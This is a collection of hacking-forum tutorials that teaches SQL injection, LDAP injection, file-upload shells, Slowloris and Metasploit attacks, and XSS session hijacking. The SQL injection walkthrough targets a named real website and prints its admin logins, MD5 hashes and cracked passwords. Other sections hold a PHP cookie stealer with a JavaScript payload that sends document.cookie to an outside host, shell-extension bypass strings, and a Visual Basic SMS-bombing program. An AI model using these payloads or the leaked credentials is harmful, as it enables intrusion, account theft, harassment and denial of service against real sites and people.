The High Roller

(I did not write this tutorial, I simply re-wrote it in my own words. All credits go to the original author) Before we start, I will explain what we are going to do here. In this tutorial, you are going to be forcing your Skype to connect to a proxy via registry settings so that your real IP cannot be obtained via Skype Resolver. So you know how Skype has the option to set a proxy for you to use? Well it never actually connects to that proxy unless you cannot directly connect to Skype (using your real IP). You can circumvent this by forcing Skype to connect to the proxy via registry. Step 1. Obtain a HTTPS or SOCKS5 Proxy. You can get either of these types of proxies via http://www.hidemyass.com/proxy-list/ (or some other proxy list) and specifying which type of proxy you would like to find. Step 2. Follow this link: https://dl.dropbox.com/u/33446/twitch/skype.html Once you're here, choose the type of proxy that you are using (HTTPS or SOCKS5), enter the IP Address and the port of the proxy and then hit "SAVE TO DISK" This will save a .reg file to your desktop/downloads/whatever path you chose to download it too. Step 3. Merge/Open the .reg file. Navigate to wherever you saved the registry file, right click it and click on "Merge". Alternatively you can just double click the file and it will have the same effect. Step 4. Restart Skype/Computer. I'm not entirely sure if you have to restart your computer every time you do this or if you can just restart Skype (sign out and sign back in). I've done some experimenting and it seems as if you can just sign out and sign back in once you've completed the above steps and it should work just fine. Remember, if you end up getting a bad proxy or if your proxy dies you can always go back to https://dl.dropbox.com/u/33446/twitch/skype.html and download the SkypeRemoveProxy.reg file located to the right of the "SAVE TO DISK" button. You can also do this if you don't need to/want to connect to a proxy upon signing into Skype.

As requested: First, open Visual Basic 2010. Download from here http://www.microsoft.com/visualstudio/eng/downloads Next, Make a new project, windows forms. Then add : 4 Textboxes 6 Labels 1 Rich Text box 1 timer 2 buttons and 1 listbox From the Toolbox menu. Click on 1 label and change it's text to Number, then put it by the first textbox. Get another label and change it's text to Subject and put it by the 2nd textbox. Get another label and change it's text to Username and put it by the 3rd textbox. Another label, change text to Password and put it by 4th textbox. Another label, change text to Message and put by Rich text box. Finally, last label, put it by listbox and change text to carrier. Click on the listbox, then click on the arrow by the listbox and select edit items. Input the following: @myboostmobile.com @txt.att.net @messaging.nextel.com @vtext.com Feel free to add more sms servers on new lines. The code, which I will explain line by line, is here: Imports System.Net.Mail Imports System.Web Imports System.IO Public Class sms Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Timer1.Start() End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick Dim EmailMessage As New MailMessage Dim TheTelephoneNumber As String = TextBox1.Text Dim MyCarrier As String = ComboBox1.SelectedItem.ToString() EmailMessage.From = New MailAddress(TextBox3.Text) EmailMessage.To.Add(TheTelephoneNumber + MyCarrier) EmailMessage.Subject = (TextBox2.Text) EmailMessage.Body = (RichTextBox1.Text) EmailMessage.Priority = MailPriority.High Dim SimpleSMTP As New SmtpClient SimpleSMTP.Port = 587 SimpleSMTP.Host = "smtp.gmail.com" SimpleSMTP.EnableSsl = True SimpleSMTP.Credentials = New System.Net.NetworkCredential(TextBox3.Text, TextBox4.Text) SimpleSMTP.Send(EmailMessage) End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click Timer1.Stop() End Sub End Class Imports System.Net.Mail Imports System.Web Imports System.IO This imports everything that is needed. Public Class sms Declares the class name as sms. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Timer1.Start() End Sub Declares when button1 is clicked, timer1 starts. Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick Dim EmailMessage As New MailMessage Dim TheTelephoneNumber As String = TextBox1.Text Dim MyCarrier As String = ComboBox1.SelectedItem.ToString() EmailMessage.From = New MailAddress(TextBox4.Text) EmailMessage.To.Add(TheTelephoneNumber + MyCarrier) EmailMessage.Subject = (TextBox2.Text) EmailMessage.Body = (RichTextBox1.Text) EmailMessage.Priority = MailPriority.High Dim SimpleSMTP As New SmtpClient SimpleSMTP.Port = 587 SimpleSMTP.Host = "smtp.gmail.com" SimpleSMTP.EnableSsl = True SimpleSMTP.Credentials = New System.Net.NetworkCredential(TextBox4.Text, TextBox5.Text) SimpleSMTP.Send(EmailMessage) End Sub This is the actual bombing part. First, it declares all the variables, then sets each textbox to a part of the email. Finally, using gmail, sends the text. Now because this is a timer, it will do the code repeatedly. Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click Timer1.Stop() End Sub End Class Declares that button2 will stop timer1 and ends the class. Now run it by pressing f5 or clicking the play button at the top. Tell me if you get any errors.

Aslam 0 alaikum What we are going to learn today is what we called UNION Based SQL injection First you want to find the Valun site using sql dorks like this "inurl:index.php/id=" Step1: Finding the vulnerability in a website many links likes that http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 so you put string at the last (') the link become http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22' You get the error then the site is valun the link i provided is valun Step2: Finding the number of columns a website has now we need to find the number of columns by adding at the end of the link order by x-- *where 'x' is random integer so the link become like this http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 1--no error http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 2-- no error http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 8--no error and so on We increace the number untill we get the error http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 order by 9-- Here we get the error so now we know that the number of columns are 8 Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement If we perform the UNION SELECT statement, we can get both users and admin information from their database The point is that, UNION SELECT returns our results with the information we need If you want to find vulnerable columns, use UNION SELECT If you want to find version of database, UNION SELECT If you want admin information! use UNION SELECT Alright, now that we know something about the Union function, lets continue. Take our website that has 11 columns and add a "UNION SELECT" statement. Here's how our query will look like. http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=22 UNION SELECT 1,2,3,4,5,6,7,8-- This is what you would normally do if you use UNION function while SQL injecting a website Focus on something like this, "index.php?id=-X UNION SELECT N--" Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X" http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,5,6,7,8-- Step4: Random numbers appear on screen, the next step Here you'll find a bunch of numbers showing up on the screen. These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract. In my given site you saw 5 and 7 You need to inject the number at the very top (always at the very top) So, in this case we have number "5" Now you might be asking, what can I do with a vulnerable column? Well here's what you can get-- INFORMATION! You need a lot of information to study from the website, here are a couple of examples. Replace the vulnerable column i.e number 5 with a statement group_concat(CHAR(32,58,32),user(),database(),version()) user() = find the user information version() = find the version of the database database() = find the current database link becomes like http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8-- tfnprimary2012@184.168.27.57 : tfnprimary2012 : 5.0.96-log user()=tfnprimary2012@184.168.27.57 database()=tfnprimary2012 version()=5.0.96-log So the database version is 5, which is good because it'll be easier to SQL inject the website. Note: Database version less than 5 "<5" = you need to guess tables (a bit hard work) Database version greater than 5 ">5" = easy to inject with another function i.e group_concat If you ever want to SQLi a website with version <5, then you can guess the tables with the following below user username usernames admin admins users manager account accounts member login logins members tbl_user tbl_users tbl_admin tbl_admins tbl_member tbl_members tbladmins memberlist tbluser tblusers tblmanager tblmanagers tblclients tblservers adminuser usertbl userstbl admintbl adminstbl id tuser tusers uid userid user_id auid adminpass LoginID FirstName LastName cms_user cms_member cms_users cms_members cms_admin cms_admins user_admin user_info user_list user_login user_logins user_names userrights userinfo userlist webadmin webadmins Webmaster Webuser product products tblproducts tblproduct tbl_tbadmin Adminlogin We have almost every information we have about the website Look close here, we used a command "group_concat" Here's its function: Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database()) Note:Group_concat won't work with versions less than 5 Step5:Getting the table names Alright, first lets look up some functions we're gonna use to extract table names (Important) group_concat = grouping up data to a specific statement table_name = tables names to be shown on screen from = location of a specified statement information_schema.tables = information in the database with table names in it table_schema = tables in a database database() = current database in the website 0x0a = a Hex code that creates a new line for organizing tables in an order Now lets combine those functions and make up a query that will give us the table names So, here's what our link will look like: http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()-- In here, we replaced our vulnerable column with "group_concat(table_name)" and then we added a "from information_schema.tables where table_schema=database()--" after the last column (excluding the two hyphens after 11) Results on table names: content_art_articles,content_art_authors,content_art_categories,content_art_listings_spon,content_art_rotations,core_categories,core_listings_free,core_listings_spon,membership_grouppermissions,membership_groups,membership_userpermissions,membership_userrecords,membership_users,salesleads,salesleads_comm,salesleads_infotypes,salesleads_list Alright now that we've found the tables, what you're gonna have to do is that, you have to find tables where user/admin information are stored In this case, "membership_users" seems to be having an admin information stored in it. It's all about predicting and expecting what's behind every table you see Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables. Replace and Add the following Vulnerable Column = replace "(table_name)" with "(column_name)" & "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=membership_users--" If nothing happens then convert the 'membership_users' to HEX using http://www.swingnote.com/tools/texttohex.php membership_users=6d656d626572736869705f7573657273 rember to add 0x before 6d656d626572736869705f7573657273 so the link become http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x6d656d626572736869705f7573657273-- the data form tables are as memberID,passMD5,email,signupDate,groupID,isBanned,isApproved,custom1,custom2,custom3,custom4,comments we need only memberID,passMD5,email Step6:Getting Data from Columns Alright, lets extract the information Look closely at the syntax: http://www.fundraisingnetwork.info/artcat-gift-fundraisers.php?id=-22 UNION SELECT 1,2,3,4,group_concat(memberID,0x3a,passMD5,0x3a,email,0x3a),6,7,8 from membership_users-- Keep this formula-like syntax in your mind whenever you want to extract data from columns http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"-- Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- ) column names = (memberID,passMD5,email) separator = 0x3a (a hex for a colon " : ") table name = membership_users Once you execute that syntax, you get the username and password separated by a colon Results after executing the syntax: spradmin:48162419062b67c10a27752e4706d933:support@fundraisingnetwork.org mp8s4hz5:48162419062b67c10a27752e4706d933:support@fundraisingnetwork.org 43449928:16c03ee03a4a7060c40e98dad78b34a2:jolian@justfundraising.com 783185498:1901151906d22575c80feda185f6c537:service@easyfundraisingcards.com admin:48162419062b67c10a27752e4706d933:support Bingo we got the admin login details now crack the MD5 hash by http://www.md5decrypter.co.uk/ we found that 48162419062b67c10a27752e4706d933 MD5: xZver5n3 48162419062b67c10a27752e4706d933 MD5: xZver5n3 48162419062b67c10a27752e4706d933 MD5: xZver5n3 16c03ee03a4a7060c40e98dad78b34a2 MD5: justfund 1901151906d22575c80feda185f6c537 MD5: nw8YcxP Now find the admin login and upload the shell and Bingo :) Any qustions relating to this tut feel free to ask Regards : The High Roller

- Definition - First off, let's start from the very beginning. Lightweight Directory Access Protocol or abbreviated (LDAP) is a protocol from the OSI model that appends to the Application Layer (#7). As of its abbreviation, LDAP is pretty much responsible for the allocation of resources in directories over a network. Crafting LDAP queries so as to have the effect of injections can grant you access over a lot of sections in a LDAP based page. Injection can be carried out mainly in input fields and URL parameters where the code fails to sanitize and filter the user supplied input. - How it works - Let's take a basic example of a LDAP authentication system. The code below makes a connection to our LDAP server (in our case we use a direct URL instead of a hostname because OpenLDAP enables me to do so and because of the possibility of escaping port usage) and upon a successful match between the credentials supplied (username & password) we get logged in. We generate a bind out of the connection query and user credentials. If the bind generated above is not successful the code will end up with an anonymous bind which would be true for the server and we get logged in. It pretty much has the same functionality as a normal php-based procedurelly written code but with a few more possibilities. As I mentioned this is a plain example of a login system based on LDAP so as to get you familiarized with the process as a whole. - Exploitation - Suppose we have a little bit of a more modified query. search("(&(cn=Keeper)(Passwd=HackForums))") The "cn" acts the role of our username and "Passwd" - you guess. What we aim to do is to login without either an actually valid username or a valid password. Considering the above code has no user data filtration we can do the following in order to get logged in: As from the image above, we need to check the name of the input field. It's name is the value for the $_GET[''] function. So if not properly sanitized we could log in with the following query as a username: usrname)(&))( Which will always be a true statement for the server because $_GET['usrname'] is actually equal to usrname. And as for the password - he can leave it empty or better yet type a random string just in case there is a check for empty fields. That way the second filter (password field) will be ignored because when validating the query, the server will notice that we've supplied a true statement and won't continue to check whether the password is corresponding to the username or not. - Escalating Privileges - Suppose, we've got a page, after successfully logging in, with files that are only accessible by users of a predefined rank (the picture shows the result of the injection). Let's take a look at our code that monitors and displays the content depending on the user's rank. (&(page_location=crypts)(rank=registered)) Our goal is to alter our rank. So we need to supply at least one true statement so as to get access to the directory. First we finish the query (colored green) and then we start it again (colored red) so as to fit the whole request. page_location=crypts)(rank=*))(&(page_location=crypts In this case we get the following result from the query that has been executed: (&(page_location=crypts)(rank=*))(&(page_location=crypt)(rank=registered) Hope you got something out of it. Thanks for reading!

Introduction Let's start off with the definition. An arbitrary file is any file on a specific server or system. Basically, the arbitrary file is a file that allows you to modify everything on a system. For example, if you got access to a particular website part of a shared server and you manage to root it, the files from the "box" are arbitrary - those on the site itself are not. Now, we can have only a limited number of actions handling arbitrary files. Those are the three following: [*] Arbitrary File Deletion [*] Arbitrary File Overwriting [*] Arbitrary File Uploading Arbitrary File Deletion Such method is most usually implemented on websites that lack directory access permissions or do not have any at all. In that case, the hacker can easily directly access the page for file deletion. It is most usually used for random websites, since exploring a targeted website could take quite a lot of time in order to find the path (if, of course, you don't already have the server-side files). I've posted some dorks for arbitrary file deletion below: inurl:"delete.php?file=" ext:php inurl:"delete?filename=" ext:php inurl:"delete.aspx?file=" ext:php inurl:"action=delete?file=" ext:php Let's say, we've found a website We can see in the URL the directory of ../delete.php?file= In our case the target for deletion is a person's information board. It is just encoded in Base64 for some reason and resolves to the following string: /www/egypt3/data/peop/Selvia,+John+and+Lisa/phone1 We may use this parameter to delete any file on the server that is hosted on this particular website as long as we are aware of the full path or manage to exploit a directory disclosure vulnerability. Arbitrary File Upload Get about some dork and find an uploading script. inurl:"upload.php?file=" ext:php inurl:"upload?filename=" ext:php inurl:"upload.aspx?file=" ext:php inurl:"action=upload?file=" ext:php This is how my target looks like. A simple upload page (possibly without any filtration upon user input). Try and upload your shell directly. If not successful, spoof the extension to one of these using the null byte: shell.php;.jpg shell.php..jpg shell.php.jpg; shell.php.jpg:; shell.php.jpg%; shell.php.jpg%00 shell.php%00.jpg shell.php.jpg;%00 shell.php.jpg%00:; and upon uploading, tamper the POST request with Tamper Data (this has been covered on a lot of tutorials, and you could really easily search for it rather than me explaining it over and over again) so as to change the extension back to what it really is (.php). Whoops, we've got our c99 uploaded on their server. If that method of uploading did not work for you, try using a binder and spoof the extension properly. FreeFloat FTP I decided to put up a basic example of a windows exploitation through Metasploit using a public exploit. We gonna use FreeFloat FTP exploit to upload an Arbitrary File on a server. The exploit usage is the following: This module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User's default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server's file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded. $ msfconsole msf > use exploit/windows/ftp/freefloatftp_wbem msf exploit(freefloatftp_wbem) > show payloads msf exploit(freefloatftp_wbem) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(freefloatftp_wbem) > set LHOST [MY IP ADDRESS] msf exploit(freefloatftp_wbem) > set RHOST [TARGET IP] msf exploit(freefloatftp_wbem) > exploit Set/Define the payload Define the localhost [LHOST]. You can view your IP address with ifconfig under your network interface (most usually eth1), next to inet addr. Define the Remote Host [RHOST]. Just the IP address of the windows victim machine. Now type exploit (how ironic) and the payload should be delivered successfully. That's all about Arbitrary Files I managed to think of. Leave a comment and hope you learnt something! :pirate:

What Is The Hacker? While most people think of hackers as of people who are deprived from any kind of social life and all they do is cram codes executed on black cascading windows. In reality a hacker is something way more different. Usually, he thinks of how he could bypass something and use it in a way that is not naturally expected or predicted. Hackers tend to be people that think in a rational way and in most cases “out of the box”. What’s more, their success over developers is hidden mainly in that concept – because they think of alternatives that from a programmer’s point of view won’t actually work. Another aspect of the art of hacking that is often mistaken is the difference between the hacker and the cracker. As mentioned above the hacker manages to make his way to a certain level of a security system, either for a particular reason or simply for self-satisfaction. To hack means to penetrate while the term “crack” would refer to a person or rather a computer specialist that, for example, succeeds in deciphering an algorithm or an encrypted sequence of data. Hacker’s Concept And Attitude The hacker is often a person who behaves differently from the others and in most cases stays neutral to everything happening around him. He/She thinks of himself/herself as a person who is beyond others because they do not possess his/her knowledge but never shows it or boasts about it. They respect people of their culture or sphere of educating (computer specialists, famous hackers or simply their IT teacher). Often a lot of the famous hackers we know are lacking communication skills or are just anti-social and prefer to close in themselves. This is referred to as the Asperger’s syndrome from which they gain extremely extensive way of thinking and develop their professional computer skills. Nowadays most “hackers” (in inverted commas because they are not real hackers) tend to post vulnerabilities of random websites or better yet ask for approval or praise if they share such. Back in those days, when hacking was still in its foundation, hackers would think of the Internet as of a place where you are free to do whatever you want. They respect the freedom of choice and totally oppose dictatorship. Most hackers tend to join different groups or societies where they can help each other or share rare exploits or 0days. However, such mutual trust is often dangerous as if one member gets caught by the officials; he might decide to sell out his friendship with the others in order to receive a less severe punishment or to escape prison as a whole. Skills Required For a Hacker A typical hacker would be well aware of a lot of things connected with computers and the right way of using them. Some of the basics for a hacker are:[/align] Able to code in at least two or three programming languages [align=center]Depending on what kind of hacker you are going to be you need to learn specific programming languages. 1) For website hackers mark-up languages such as HTML (Hypertext Markup Language), XML (eXtensive Markup Language) and others are more than obligatory. Also essential are programming languages like: PHP, SQL, Java and JavaScript. 2) For desktop based hackers that use to develop malware, viruses, RATs and other malicious software: C, C#, C++ and of course the Batch compiling.[/align] Have rational thinking and good logic. That has more to do with nature. Although, however, one might develop his way of thinking through long years of practice. Be aware of every public exploit that occurs Keep track of every new exploit and go through it thoroughly. A good place to do this is joining the underground forums for hackers or just visits exploit-db.com. Depend on or trust nobody Even your most fellow partners can let you down. In order to carry on, you need not get caught. Able to understand the structure of systems Last but not least, probably the most essential part – ability to analyze codes and determine the way the system works. Benefits and Style Hackers are not to be mistaken with all the evil guys that sit behind the computer and think of a way to destroy somebody else’s work. Depending on their point of view and understanding of what is good or not they are divided into several groups: White Hat Hackers Those are the helpers and “good” guys that would naturally give you advise or inform you for any inaccuracies or bugs in your system. They do not blackmail or threaten other people – if they spot a vulnerability they would even find out a way of fixing it and then get in touch with you. Black Hat Hackers You might guess who those guys are. Yes, these are the ones that would do anything to make you feel embarrassed and be ashamed of yourself for not being able to secure your project. They are the absolute opposition of the white hats and often some of the best hackers are part of them. Red Hat Hackers The red hat hacker is almost identical to the black hat hacker. It is just another term of referring to them. Gray Hat Hackers Those are the neutral ones. They are neither white nor black hats, but can act as both. If it suits them, they will report the vulnerability to you – if it doesn’t they’ll exploit it and boast about themselves. Usually such hackers are the most common type. Script-kiddies Script-kiddies or skids are the lowest rank in the hacker hierarchy. Those are usually the wannabe hackers which basically have no knowledge or very little. They often spam around so as to attract attention or to receive a hacking tool. Among the benefits that most hackers favor is the money. That’s the reason why some people spend entire weeks in front of the computer in order to make their living. Another top benefit that is being made use of is the reputation you have amongst the others. Calling you a hacker, your echo grows bigger and bigger every day. You are well connected and often referred to as a person with a lot of knowledge who is being respected and well treated. But hacking is not necessarily to be taken as a duty or part of a goal one aims to achieve – it can simply be started as a hobby alongside programming.

Introduction To begin with, let's start off from the very beginning. I'll go through the very basics and fundamentals of networking and reaching to a somewhat decent level of knowledge, concluding with all the detailed aspects of managing networks and servers' operations. How servers communicate with each other The network flow consists of packets that are being exchanged over the World Wide Web (WWW, as we know it). In order for a client to exchange information with a specific server, the client must sent over packets containing the request over to the server. The server then returns an answer for the request contained within packets of data. A flow is the period of time within which, packets from the same source and destination have occurred. Depending on the link the traffic can be: ■ Uni-directional ■ Bi-directional The uni-directional traffic is a one-way traffic that creates one flow and does not use reverse channel arguments unlike some protocols like TCP. A basic example of a uni-directional traffic would be using the User Datagram Protocol (UDP) so as to generate a single flow without requesting an answer from the server. The bi-directional traffic is a two-way traffic that creates two flows. One flow is generated upon a request made to the server by the client and a second flow is being generated in order to return the answer to the client from the server. Common usage of a bi-directional traffic is that of sockets and also ICMP as a protocol. Both of them are part of the so-called UDLD (Unidirectional Link Detection) data link layer that has the mission to determine whether a link is broken or not. So basically the first thing the client has to do in order to establish a connection to a particular node (connection point), he must generate an endpoint which will use a specific transport provider to carry the information. Next step is to specify the node itself with the address information so as for the client to be able to locate the destination. Then the client-server connects to the server and awaits a response. Whenever the server analyzes the payload it is ready to return an answer whether the request had been accepted or rejected. Then the communication between the nodes is over and the connection is aborted. Duplexes The duplex is a point-to-point system, consisting of two nodes that communicate and exchange information with each another. Depending on the type of communication those systems are half-duplex and full-duplex. The half-duplex is when only one of the connection points can send/receive at a moment. The full-duplex is when both nodes send and receive data over the network simultaneously. OSI Model Most plainly said, the Open Systems Interconnection (abbreviated OSI) model defines the phases that the data must be parsed through in order to reach a certain node over a network. It allocates different types of payloads of delivery into different protocols that are part of layers. The OSI model consists of seven layers. Each layer consists of protocols. Those are (as follows): Physical Layer [#1] This layer is the first and lowest in the OSI model. It is responsible for the management of electrical signals. A fundamental layer configuring the logical data structures of the higher level functions in a network. Some of it's protocols are: ► Telephone network modems- V.92 ► IRDA physical layer ► USB physical layer ► EIA RS-232, EIA-422, EIA-423, RS-449, RS-485 ► Ethernet physical layer ► Varieties of 802.11 Wi-Fi physical layers ► DSL ► ISDN ► SONET/SDH ► Optical Transport Network (OTN) ► GSM Um air interface physical layer ► Bluetooth physical layer ► ITU Recommendations: see ITU-T ► IEEE 1394 interface ► TransferJet physical layer The Physical layer mainly manages cables, connectors, hubs, and repeaters. Data Link Layer [#2] The Data Link or just Link Layer is responsible for addressing between nodes, error notifications and output of server-side errors. Most usually we come to know it around the casual status codes like 403, 404 etc. that we encounter upon an unsuccessful attempt to access a page, directory or link. The following protocols append to the Data Link layer: ► ARP/InARP ► NDP ► Different types of tunnels ► L2TP ► Ethernet ► DSL ► ISDN ► FDDI ► PPP ► Media Access Control As I mentioned, part of this layer's duties is to notify of a permission denied page or other resources. As of that I have included the top most common status codes that occur. Network Layer [#3] This is the third layer in the OSI model also known as Internet Layer. The layer manages logical addressing between nodes, routing functions and host addressing where you can track the source to its location. Also controls message forwarding operations for packet forwarding over a network. Some of its protocols are: ► BGP ► ECN ► IGMP ► IPsec ► IP ► IPv4 ► IPv6 ► ICMP ► ICMPv6 ► RIP ► OSPF We come to know it as of the IP (Internet Protocol) which is mostly used to determine users over a network and restrict permissions or grant privileges. Transport Layer [#4] Probably one of the most important layers in the OSI model. The Transport Layer (#4) provides end-to-end communication over a network. It also enables data being transferred in stealth and controls the flow. Usually Denial of Service attacks are being carried over this layer. Some of the protocols it includes are: [/align] [align=center] ► UDP ► SYN ► TCP ► WTCP ► DCCP ► SCTP ► RSVP ► TIPC ► ALCAP ► WAP Datagram Protocol ► Xpress Session Layer [#5] A connection between two applications is called a session. The fifth layer - Session Layer - establishes, manages and terminates connections between applications. The session layer (as of its name) operates sessions. It can open and/or close a session. Also responsible for the restoration of an inactive session and so on. The protocols that append to it are the following: ► NetBIOS ► SAP ► PPTP ► RTP ► Named Pipe ► SOCKS ► SPDY ► TLS/SSL Presentation Layer [#6] The sixth layer of the OSI model is the presentation layer. Imagine we have a courier, a recipient and a factory. This layer serves as the courier. It encrypts data over the network and configures it in a way that only the designated connection point can read and accept it. By far it contains of only two protocols: ► MIME ► XDR Application Layer [#7] Now the final layer of the OSI model is the Application Layer (#7). This layer is pretty much responsible for identifying the connection points and user authentication. Its protocols rely on protocols from the transport layer in order to establish host-to-host connections. It includes the following protocols: ► DHCP ► DHCPv6 ► DNS ► FTP ► HTTP ► IMAP ► IRC ► LDAP ► MGCP ► NNTP ► BGP ► NTP ► POP ► RPC ► RTSP ► RIP ► SIP ► SMTP ► SNMP ► SSH ► Telnet Denial of Service Let's see a basic example of a Denial of Service (DoS) attack, carried out through a Slowloris script against an Apache server. Let's first load up our script. What the Slowloris attack does is open an amount of connections to a host and leaving them open for as long as possible. Meanwhile, whenever a connection is about to get terminated due to inactivity Slowloris sends HTTP headers to keep it alive. That way the DoS is rarely filtered up automatically and a system crashes quickly without manual nullrouting. We will start by running the script with: ./slowloris.pl http://i1067.photobucket.com/albums/u433/aeroxtk/wdada_zps8ec3071a.png[/img] First of all, in case we are now aware of the timeouts, the script offers a mode for testing. Based on port usage Slowloris determines the timeouts itself, although the numbers won't be precise it is still recommended that we should first start off with this. ./slowloris.pl -dns [url=http://www.site.com]www.site.com[/url] -port 80 -test But let's say we've got the timeout (for example the number 1500). What we want to do now is launch the actual attack. ./slowloris.pl -dns [url=http://www.site.com]www.site.com[/url] -port 80 -timeout 1500 -num 700 -tcpto 5 The -num switch is for how many sockets to be used to initiate the attack. Also the -tcpto should be set to the value of 5 (by default). http://i.imgur.com/e6rnuSe.png[/img] Also a thing that could usually bust our whole attack is the HTTPReady accept filter. This filter buffers entire HTTP requests at the kernel level. Once the entire request is received, the kernel sends it to the server. So as Slowloris is based on opening connections and leaving them open for as long as possible, that pretty much fails our attack. However, the developer of the script has thought of this and developed a method that would send the attack as a POST verses a GET or HEAD request. We come to use it by the -httpready switch (how ironic). http://i1067.photobucket.com/albums/u433/aeroxtk/123_zpsbeccc689.png[/img] Now let's have a look at some statistical information, Monitoring the bandwidth usage during the attack, it is plainly visible that we use a minimum part of it but actually manage to take down an Apache server with it. In comparison the this the victim we have targeted has most of its traffic timeout (in red). http://i.imgur.com/XViEVT9.jpg[/img] Smurf Attacks Smurf attacks represent an attack carried over the IP protocol using Internet Control Message Protocol (ICMP). ICMP packets are being sent in immense amounts with a spoofed Internet Protocol source. The attack is by far a pretty advanced method of attacking a server. It is both reflective and amplificational. Lemme explain it a bit plainer. The victim server returns an answer to the slave (which is in control of the actual attacker) from the ICMP request/packet. Each time it is being returned it gets multiplied as the attacker's server replies the answer that was first replied by the target. That explain both theories of amplification and reflection. The more slaves there are, the harder the impact will be. In a network there may be hundreds of bots, all of which replying to the server responses and overloading it to excess. Smurfing attacks as mentioned above use a spoofed IP source to perform their attacks in stealth. The spoofed protocol is randomly generated sequence of numbers that does not originate in fact but has the illusion it does. However, if a developer blocks ICMP response packets this will pretty much mitigate the attack. Conclusion I guess, I placed it a bit noob friendly for people who are new to this. All in all took me two days but there is Part 2 coming soon. Thanks for reading!

About In this tutorial, I'll go through the processes of exploiting/manipulating cookies. A cookie, also known as browser cookie, is usually a small piece of data sent from a website and stored in a user's browser while a user is browsing a website. When the user visits the website after closing it, he will have session active because of the cookie retrieved information. Session Hijacking First of all, let's begin by explaining what session hijacking is. Basically, when a user registers at a website, he has his login credentials stored in a database. Upon successfully supplying and retrieval of that information, the user gets logged in. That particular attempt of logging and entering the account is creating a session. Sessions keep users logged throughout their whole browsing of the website. Sessions have a name, value and a domain they are working on. Each session has a unique value which could not be traced normally for different users. However, we could use cross-site scripting (XSS) to grab the user's session ID and MD5 hash value. For the sake of this tutorial, we will use the following: ■ Mozilla Firefox ■ Firebug (add-on) ■ Hosted PHP-based cookie stealer Our goal is to steal the admin cookie which contains an active session. This could be done via cross-site scripting (XSS). So our vulnerability must be in the scope of the website we have as a target. We need to design a piece of code that would redirect the administrator upon clicking it to a page where our cookie stealer is located. Let's say we've found a vulnerable message system with a few input fields. What we aim to do now is send a small forged Javascript code that contains a false link. But what exactly is the cookie stealer? Cookie Stealer The cookie stealer plays the role of our cookie collector. Whenever our target visits the page with the cookie stealer, it will automatically log his cookies. <?php $container = $HTTP_GET_VARS['cookie']; $file = fopen('logger.txt', 'a'); fwrite($file, $container . '\n\n'); ?> Upload it to your server (I use 000webhost) with the .php extension, of course. Either with an FTP client like FileZilla or the web-based one. All that this small piece of code does is the following: With the $container variable we collect/store the cookie itself. The $file variable creates a file that will store the cookie information. And the fwrite() function saves the cookie to the file. Now the \n is used to make a breakline. Practically, it bears the same function of <br /> tag in HTML. Now all that is left is to forge the Javascript code that we are going to use to trick the admin to our cookie stealer. javascript:void(window.location="www.[Censored].com/CookieLogger.php" + document.cookie) The void() function in Javascript indicates that the link will open on the same page. The window.location serves the role of <a href=""> in HTML - Redirecting. And the document.cookie is the part where we grab the cookie from the user. Ok, say we've got the cookie logged successfully. We now need to change our session value to the one we've got. strUsername=Administrator%40Account strPassword=5b3de25c4dba50d2102281633d339b48 Now right click and Edit the cookie. That way we'll get the last active session of the administrator. We will do the same thing with the password. But note that it's hashed in MD5. Notice: Do NOT try cracking the hash and then place it's plaintext as a session value. It needs to be hashed in order to be parsed by the server. You can also get to use the session within the URL bar. Delete the address and type: javascript:void(document.cookie="strUsername=Administrator%40Account") Then the same process for the password javascript:void(document.cookie="strPassword=5b3de25c4dba50d2102281633d339b48") That ends the tutorial. Hope you got something out of it. Thanks for reading!

Tor's hammer Is a DoS tool that can DoS through tor without hitting tor at all Download and extract somewhere Open the command line. Navigate to the directory of dostor. Type torshammer.py for windows or python torshammer.py for linux. Follow the instructions. Enjoy What is it? You've never heard of Tor's hammer? It's a DoS tool that can DoS through tor without hitting tor at all. Posting in OP.

